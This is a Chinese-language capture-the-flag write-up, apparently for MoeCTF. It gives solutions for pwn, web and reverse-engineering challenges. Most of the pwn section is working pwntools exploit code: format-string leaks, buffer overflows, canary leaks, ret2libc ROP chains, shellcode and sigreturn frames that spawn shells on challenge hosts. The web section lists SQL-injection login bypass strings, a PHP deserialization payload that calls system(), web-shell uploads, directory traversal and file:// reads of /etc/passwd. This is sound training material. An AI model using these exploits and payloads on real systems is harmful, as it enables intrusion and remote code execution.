Pwn:
二进制漏洞审计入门指北:
nc直接有flag
flag_helper:
这里实际上考了mmap的参数
from pwn import*
context(log_level='debug')
p=remote('26.198.202.50',58549)
p.sendlineafter(b'>',b'4')
p.sendlineafter(b'>',b'./flag')
p.sendlineafter(b'>',b'0')
p.sendlineafter(b'>',b'7')
p.sendlineafter(b'>',b'34')
p.sendlineafter(b'>',b'5')
p.interactive()no_more_gets:
随机的密码,但是随机的密码有可能会以\x00开头,如果随机到\x00那密码此时就是\x00而已
from pwn import*
while True:
p=remote('26.198.202.50',54345)
p.sendlineafter(b'get out.',b'\x00')
p.recvline()
key=p.recvline()
print(key)
if b'Welcome back.' in key:
p.interactive()
else:
p.close()leak_sth:
from pwn import*
context(log_level='debug')
p=process('./leaksth')
p=remote('26.198.202.50',9999)
def gdbs():
gdb.attach(p)
pause()
payload=b'%7$p'
p.sendlineafter(b'your name?',payload)
p.recvline()
p.recvline()
num=int(p.recv(10),16)
print(hex(num))
payload=str(num)
p.sendlineafter(b'Give me the number',payload)
p.interactive()ez_shellcode:
感觉没啥可讲的
from pwn import*
context(arch='amd64')
p=process('./ezshellcode')
p=remote('26.198.202.50',53876)
def gdbs():
gdb.attach(p)
pause()
p.sendlineafter(b'Tell me your age:',b'-1')
p.recvuntil(b'Here is a gift for you :\n')
gift=int(p.recv(14),16)
payload=asm(shellcraft.sh())
payload=payload.ljust(0x68,b'\x90')
payload+=p64(gift)
print(hex(gift))
p.sendlineafter(b'What do you want to say?',payload)
p.interactive()LoginSystem:
依旧没啥讲的
from pwn import*
p=process('./login')
p=remote('26.198.202.50',55448)
password=0x404050
payload=b'aaaa%9$s'+p64(password)
p.sendlineafter(b'username:',payload)
p.recvuntil(b'aaaa')
password=u64(p.recv(8))
p.sendlineafter(b'Please input your password:',p64(password))
p.interactive()
#8Catch_the_canary!:
from pwn import*
context(log_level='debug')
backdoor=0x4012C9
for i in range(16768186,16768186+9029):
p=remote('26.198.202.50',57055)
p.sendline(str(i))
p.recvline()
p.recvline()
key=p.recvline()
print(key)
if b'[Error] Wrong! Try again.' in key:
p.close()
else:
break
payload=b'a'*0x10+p64(0xbacd003)
p.sendlineafter(b'One shot.',b'+')
p.sendline(b'1')
p.sendline(str(0xbacd003))
p.sendafter(b'Stop it!',b'a'*0x19)
p.recvuntil(b'a'*0x19)
canary=u64(p.recv(8))
canary=(canary-0x100000000000000)<<8
print(hex(canary))
payload=b'a'*0x18+p64(canary)+b'a'*8+p64(backdoor)
p.sendline(payload)
p.interactive()System_not_found!:
感觉还行
from pwn import*
context(log_level='debug')
p=process('./dialogue')
p=remote('26.198.202.50',53213)
puts_plt=0x401040
main=0x4011E1
ret=0x000000000040101a
payload=b'\xff'*0x11
p.sendlineafter(b'your name?',payload)
payload=b'a'*(0x28+8)+p64(puts_plt)+p64(main)
p.sendlineafter(b'Where do you come from?',payload)
onelibc=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("onelibc= "+hex(onelibc))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=onelibc-0x62050
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x000000000002a3e5
payload=b'\xff'*0x11
p.sendlineafter(b'your name?',payload)
payload=b'a'*(0x28+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendlineafter(b'Where do you come from?',payload)
p.interactive()这是什么?shellcode!:
感觉pwntools写的shellcode也能用
from pwn import*
context(arch='amd64')
p=process('./preshellcode')
p=remote('26.198.202.50',64169)
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()也可以自己写
from pwn import*
context(arch='amd64')
p=process('./preshellcode')
#p=remote('26.198.202.50',64169)
shellcode=asm('''
mov rbx, 0x0068732f6e69622f
push rbx
mov rax,59
mov rdi,rsp
mov rsi,0
mov rdx,0
syscall
''')
p.sendline(shellcode)
p.interactive()这是什么?libc!:
我用的是ubuntu22,所以可以直接libc
from pwn import*
p=process('./prelibc')
p=remote('26.198.202.50',65444)
p.recvuntil(b'libc: ')
puts_addr=int(p.recv(14),16)
print(hex(puts_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x000000000002a3e5
ret=libcbase+0x0000000000029139
payload=b'a'*9+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()这是什么?32-bit!:
from pwn import*
p=process('./backdoor')
p=remote('26.198.202.50',63046)
execve=0x80490A0
binsh=0x804A011
def gdbs():
gdb.attach(p)
pause()
payload=b'a'*(0x28+5)+p32(execve)+p32(0)+p32(binsh)+p32(0)*2
#gdbs()
p.sendline(payload)
p.interactive()这是什么?GOT!:
from pwn import*
context(log_level='debug')
p=process('./pregot')
p=remote('26.198.202.50',54772)
system_plt=0x401050
backdoor=0x40119A
callread=0x401280
def gdbs():
gdb.attach(p)
pause()
payload=p64(0)*2+p64(0x401056)+p64(0)*2+p64(backdoor)+p64(0)+p64(callread)
#gdbs()
p.sendafter(b'This is `puts`.',payload)
p.interactive()这是什么?random!:
from pwn import*
from ctypes import*
import ctypes
context(log_level='debug')
p=process('./prerandom')
p=remote('26.198.202.50',52274)
def gdbs():
gdb.attach(p)
pause()
dll=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
class tm(ctypes.Structure):
_fields_ = [
("tm_sec", ctypes.c_int),
("tm_min", ctypes.c_int),
("tm_hour", ctypes.c_int),
("tm_mday", ctypes.c_int),
("tm_mon", ctypes.c_int),
("tm_year", ctypes.c_int),
("tm_wday", ctypes.c_int),
("tm_yday", ctypes.c_int),
("tm_isdst", ctypes.c_int)
]
timer=dll.time(None)
tm_pointer=tm()
dll.localtime.restype=ctypes.POINTER(tm)
localtime_pointer=dll.localtime(ctypes.byref(ctypes.c_long(timer)))
seed=localtime_pointer.contents
seed=seed.tm_yday
print(seed)
dll.srandom(seed)
for i in range(10):
secret=dll.random()%90000+10000
p.sendlineafter(b'>',str(secret))
p.sendlineafter(b'>',b'1')
p.sendlineafter(b'>',b'1')
p.interactive()shellcode_revenge:
from pwn import*
from ctypes import*
context(log_level='debug',arch='amd64')
def gdbs():
gdb.attach(p)
pause()
p=process('./shellcode')
#p=remote('26.198.202.50',65229)
addr=0x20240200
p.sendlineafter(b'>>>',b'1')
dll=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
seed=dll.time(0)
dll.srand(seed)
pwd=dll.rand()
p.sendlineafter(b'password:',str(pwd))
p.sendlineafter(b'>>>',b'4')
shellcode='''
syscall
'''
shellcode=asm(shellcode)+b'\xeb\x10'
print(len(shellcode))
#gdbs()
p.sendlineafter(b'Good luck.',shellcode)
shellcode=asm(shellcraft.open('./flag'))
shellcode+=asm(shellcraft.read(3,0x20240000,0x100))
shellcode+=asm(shellcraft.write(1,0x20240000,0x100))
payload=b'\x90'*0x10+shellcode
p.sendline(payload)
p.interactive()return 15:
from pwn import*
context(arch='amd64')
p=process('./return15')
p=remote('26.198.202.50',52525)
what=0x401106
syscall=0x40111C
binsh=0x402008
def gdbs():
gdb.attach(p)
pause()
sigreframe=SigreturnFrame()
sigreframe.rax=59
sigreframe.rip=syscall
sigreframe.rdi=binsh
sigreframe.rsi=0
sigreframe.rdx=0
payload=b'a'*0x28+p64(what)+p64(syscall)+bytes(sigreframe)
#gdbs()
p.sendline(payload)
p.interactive()Read_once_twice!:
from pwn import*
context(log_level='debug')
p=process('./twice')
p=remote('26.198.202.50',58165)
def gdbs():
gdb.attach(p)
pause()
p.sendafter(b'turned on?',b'a'*0x19)
p.recvuntil(b'a'*0x19)
canary=u64(b'\x00'+p.recv(7))
print(hex(canary))
payload=b'a'*0x18+p64(canary)+b'a'*0x8+b'\xc6\x01'
p.sendafter(b'more chance...',payload)
p.interactive()Web:
Web渗透测试与审计入门指北:
用phpstudy直接搭建一个本地网站就行
弗拉格之地的入口:
查看/robots.txt
查看/webtutorEntry.php得flag
ez_http:
这个满足各个条件得flag,没什么好说的,就是得bp才能看见flag
垫刀之路01: MoeCTF?启动!:
命令执行,tac /flag之后用env命令查看环境变量
ProveYourLove:
直接修改前端js代码,把不允许连续提交改了,然后点300下
弗拉格之地的挑战:
这个战线太长了,改天弄个文章来讲
ImageCloud前置:
直接用file伪协议读取,file:///etc/passwd
垫刀之路02: 普通的文件上传:
传木马连接蚁剑,用蚁剑命令执行env,查看环境变量得flag
垫刀之路03: 这是一个图床:
把一句话木马后缀改为jpg,发出并抓包,然后把后缀名改回php就行。
垫刀之路04: 一个文件浏览器:
目录穿越,然后找flag
垫刀之路05: 登陆网站:
直接万能密码
username=admin123&password=1' or true--+
username=admin123&password=1' or true#
username=admin123&password=1' or true;%00垫刀之路06: pop base mini moe:
<?php
class A {
// 注意 private 属性的序列化哦
private $evil='tac /flag';
// 如何赋值呢
private $a='system';
function __destruct() {
$s = $this->a;
$s($this->evil);
}
}
class B {
private $b;
function __invoke($c) {
$s = $this->b;
$s($c);
}
}
$p=new A();
echo urlencode(serialize($p));
?>
垫刀之路07: 泄漏的密码:
有了pin值,直接进入/console目录
依次输入以下命令,先输入import os,再输入下一个命令
import os
os.popen('cat flag').read()Reverse:
逆向工程入门指北:
直接运行程序得flag
xor:
简单的异或
result=[0x49, 0x4B, 0x41, 0x47, 0x50, 0x42, 0x5F, 0x41, 0x1C, 0x16,
0x46, 0x10, 0x13, 0x1C, 0x40, 0x09, 0x42, 0x16, 0x46, 0x1C,
0x09, 0x10, 0x10, 0x42, 0x1D, 0x09, 0x46, 0x15, 0x14, 0x14,
0x09, 0x17, 0x16, 0x14, 0x41, 0x40, 0x40, 0x16, 0x14, 0x47,
0x12, 0x40, 0x14, 0x59]
flag=''
for i in range(len(result)):
flag+=chr(result[i]^0x24)
print(flag)upx:
脱壳就有flag
dynamic:
简单的动态调试
upx-revenge:
upx手动脱壳,就出flag了。
d0tN3t:
result=[173, 146, 161, 174, 132, 179, 187, 234, 231, 244,
177, 161, 65, 13, 18, 12, 166, 247, 229, 207,
125, 109, 67, 180, 230, 156, 125, 127, 182, 236,
105, 21, 215, 148, 92, 18, 199, 137, 124, 38,
228, 55, 62, 164]
flag=''
for i in range(len(result)):
flag+=chr((((result[i]^(i*i))^114)-114)%256)
print(flag)rc4:
直接找关键数据,然后带入脚本
key=list('RC4_1s_4w3s0m3')
content=[0xA7,0x1A,0x68,0xEC,0xD8,0x27,0x11,0xCC,0x8C,0x9B,0x16,0x15,0x5C,0xD2,0x67,0x3E,0x82,0xAD,0xCE,0x75,0xD4,0xBC,0x57,0x56,0xC2,0x8A,0x52,0xB8,0x6B,0xD6,0xCC,0xF8,0xA4,0xBA,0x72,0x2F,0xE0,0x57,0x15,0xB9,0x24,0x11]
rc4number=0x100
s=[0]*rc4number
flag=''
def rc4_init(s,key,rc4number):
for i in range(rc4number):
s[i]=i
j=0
for i in range(rc4number):
j=(j+s[i]+ord(key[i%len(key)]))%rc4number
temp=s[i]
s[i]=s[j]
s[j]=temp
def rc4_endecode(s,content,rc4number):
i=0
j=0
for k in range(len(content)):
i=(i+1)%rc4number
j=(j+s[i])%rc4number
temp=s[i]
s[i]=s[j]
s[j]=temp
t=(s[i]+s[j])%rc4number
content[k]=chr(content[k]^s[t])
content=''.join(content)
print(content)
rc4_init(s,key,rc4number)
rc4_endecode(s,content,rc4number)xtea:
#include<stdio.h>
#include<stdint.h>
void decrypt(uint32_t v[2],uint32_t key[4])
{
uint32_t k0,k2,k3,k1;
uint32_t v0,v1;
v0=v[0],v1=v[1];
k0=key[0],k1=key[1],k2=key[2],k3=key[3];
uint32_t sum,delta=-0x33004445;
sum=delta*32;
for(int i=0;i<32;i++)
{
v1-=(v0 + ((v0 >> 5) ^ (16 * v0)) ) ^ (key[ ((sum >> 11) & 3)]+ sum);
sum-=delta;
v0-=(key[ (sum & 3)]+ sum) ^ (v1 + ((v1 >> 5) ^ (16 * v1)));
}
v[0]=v0,v[1]=v1;
}
int main()
{
//uint8_t v[12]={0xA3,0x69,0x96,0x26,0xBD,0x78,0x0B,0x3D,0x9D,0xA5,0x28,0x62};
uint32_t v[3]={0x269669a3,0x3d0b78bd,0x6228a59d};
uint32_t key[4]={2,0,2,4};
//decrypt((uint32_t*)&v[4],key);
//decrypt((uint32_t*)&v[0],key);
decrypt((uint32_t*)&v[1],key);
decrypt((uint32_t*)&v[0],key);
printf("moectf{%s}",v);
}还有题目没弄上来,我整理一下再发